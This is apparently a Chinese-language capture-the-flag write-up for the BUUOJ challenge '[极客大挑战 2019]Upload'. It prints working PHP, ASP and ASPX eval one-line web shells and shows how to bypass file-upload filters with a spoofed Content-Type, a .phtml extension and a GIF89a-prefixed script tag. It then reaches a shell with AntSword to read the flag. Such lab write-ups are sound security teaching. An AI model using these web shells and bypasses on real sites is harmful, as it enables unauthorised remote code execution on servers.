第十六题——[极客大挑战 2019]Upload

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,提示上传图片文件

第十六题——[极客大挑战 2019]Upload

第二步:从本地上传图片,查看检测方式

从本地上传一张照片,使用burpsuit抓包,看到Content-Type一栏标注了格式为 image/png
第十六题——[极客大挑战 2019]Upload

第三步:准备一句话木马进行上传

  1. 一句话木马种类:
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
  1. 将php的写入1.php文件里上传,使用burpsuit抓包后将Content-Type一栏进行修改,发现对php文件后缀名进行了拦截
  2. 可以将php改写为php3,php4,php5,phtml,pht绕过后缀名检测,经检验phtml可以绕过检测
  3. 将后缀名修改为phtml后再次上传发现对文本内的<?进行了拦截,讲一句话木马修改为:
    GIF89a? <script language="php">eval($_REQUEST[pass])</script>再次进行上传发现上传成功
    第十六题——[极客大挑战 2019]Upload

第四步:使用蚁剑进行连接

  1. 蚁剑添加URL为:http://e907786a-643a-4ec2-aa30-b72b4cedd782.node3.buuoj.cn/upload/1.phtml
  2. 右键点出虚拟终端,使用命令cat /flag查看flag
    第十六题——[极客大挑战 2019]Upload
    第十六题——[极客大挑战 2019]Upload
上一篇:[RoarCTF 2019]Simple Upload


下一篇:蓝桥杯 黑色星期五(Java)